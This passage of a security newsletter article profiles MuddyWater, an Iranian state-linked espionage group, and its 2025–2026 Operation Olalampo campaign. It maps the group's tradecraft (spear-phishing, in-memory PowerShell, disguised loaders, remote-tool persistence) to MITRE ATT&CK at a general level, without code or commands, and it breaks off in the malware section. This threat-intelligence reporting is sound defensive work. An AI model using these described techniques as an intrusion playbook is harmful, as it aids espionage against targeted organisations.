Who is MuddyWater?

Who is MuddyWater?A Technical Overview of the Iranian APT and the Context of Operation Olalampo
͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     ͏     
Forwarded this email? Subscribe here for more
Who is MuddyWater?
A Technical Overview of the Iranian APT and the Context of Operation Olalampo
Austin Miller
Mar 13 

READ IN APP

MuddyWater is a cyber-espionage group widely believed to operate on behalf of Iran’s intelligence apparatus. Security researchers and government agencies assess that the group is linked to the Iranian Ministry of Intelligence and Security (MOIS) and functions as part of the country’s state-sponsored cyber operations. The group has been active since at least 2017 and has conducted campaigns against government agencies, telecommunications companies, energy providers, defense contractors, and other critical sectors around the world.
Although MuddyWater’s operations originally focused on intelligence collection, the group has gradually expanded its toolkit and objectives. Recent campaigns suggest a shift toward more disruptive and hybrid operations that mix espionage, data theft, and destructive attacks. The 2025–2026 campaign, known as Operation Olalampo, illustrates this evolution. The operation targeted organisations across the Middle East and North Africa and introduced several new malware families and command-and-control techniques.
To understand the significance of Olalampo, it is necessary to examine MuddyWater’s historical development, operational patterns, and technical methods as mapped in the MITRE ATT&CK framework.
Origins and Attribution
Threat intelligence firms first began tracking MuddyWater activity in 2017. Multiple vendors independently discovered similar attack campaigns and later connected them to a single actor cluster. Over time, the group received many different names depending on the organisation reporting it. These include Seedworm, Static Kitten, Mercury, Mango Sandstorm, and TEMP.Zagros.
Despite the naming differences, most researchers now agree that these labels refer to the same threat actor. Evidence for this conclusion includes shared malware families, infrastructure reuse, and overlapping targeting patterns.
Government cybersecurity advisories and industry research link MuddyWater to Iranian intelligence operations. Analysts assess that the group operates under the Ministry of Intelligence and Security and supports the strategic objectives of the Iranian state.
Unlike some cybercriminal groups that focus on financial gain, MuddyWater campaigns usually align with geopolitical priorities. Targets frequently include government ministries, energy companies, telecommunications providers, and organisations connected to regional conflicts.
These characteristics place MuddyWater within the category of advanced persistent threats (APTs). APT groups differ from conventional cybercriminals in several ways. They are usually state-sponsored, operate over long time periods, and prioritize intelligence collection or strategic disruption over immediate financial profit.
Operational Goals and Targeting
MuddyWater campaigns commonly target organisations that provide strategic information or influence geopolitical events. These targets often include national governments, defence contractors, oil and gas companies, telecommunications firms, and infrastructure operators.
Geographically, the group has focused heavily on the Middle East, but it has also targeted victims in Asia, Europe, Africa, and North America.
The objectives of these campaigns typically include:
intelligence collection from government networks
monitoring political opponents or dissidents
gaining access to infrastructure systems
preparing for potential disruptive operations
In many cases, MuddyWater operations appear to serve both espionage and strategic positioning. By gaining long-term access to networks in energy, telecommunications, or government systems, the group can collect intelligence while also maintaining the ability to conduct disruptive attacks later.
MITRE ATT&CK Perspective: Core Tradecraft
The MITRE ATT&CK framework is widely used to map threat actor techniques across the lifecycle of a cyberattack. MuddyWater campaigns follow a consistent attack pattern that fits many of the ATT&CK tactics and techniques.
Initial Access
One of the group’s most common entry methods is spear-phishing. Attackers send carefully crafted emails to targeted individuals with malicious attachments or links. These attachments are often Microsoft Office documents that contain macros or embedded scripts. When the victim opens the document, the script downloads the next stage of the attack.
This behaviour corresponds to the MITRE ATT&CK technique Phishing (T1566) under the Initial Access tactic. In some cases, MuddyWater has also exploited vulnerabilities in public-facing servers. This allows the attackers to gain entry without relying on user interaction.
Execution
After gaining access, MuddyWater often uses scripting environments for code execution. PowerShell is a common tool in their operations. By running scripts directly in memory, attackers can avoid leaving obvious artefacts on disk.
This technique maps to Command and Scripting Interpreter (T1059) in MITRE ATT&CK.
Persistence
Maintaining access is a key part of APT operations. MuddyWater often installs remote management tools or custom backdoors that allow them to reconnect later.
Researchers have observed the group using legitimate remote administration tools to maintain persistence within compromised networks. Because these tools are normally used by system administrators, they can blend into normal network activity.
Defense Evasion
Defence evasion is another hallmark of MuddyWater activity. The group frequently obfuscates scripts and disguises malicious components as legitimate software. Examples include loaders that impersonate legitimate system files or hide malicious code inside trusted processes.
This behaviour corresponds to techniques such as Obfuscated Files or Information (T1027) and Masquerading (T1036).
Command and Control
Once a system is compromised, MuddyWater establishes command-and-control channels to communicate with the infected machine. These channels allow attackers to issue commands, upload tools, or exfiltrate data.
Historically, the group used standard web protocols or custom malware backdoors for command-and-control communication. More recent campaigns have experimented with alternative channels, including messaging platforms.
Malware and Tooling
Over the years, MuddyWater has used a wide range of malware families and tools. Some of these are custom-bui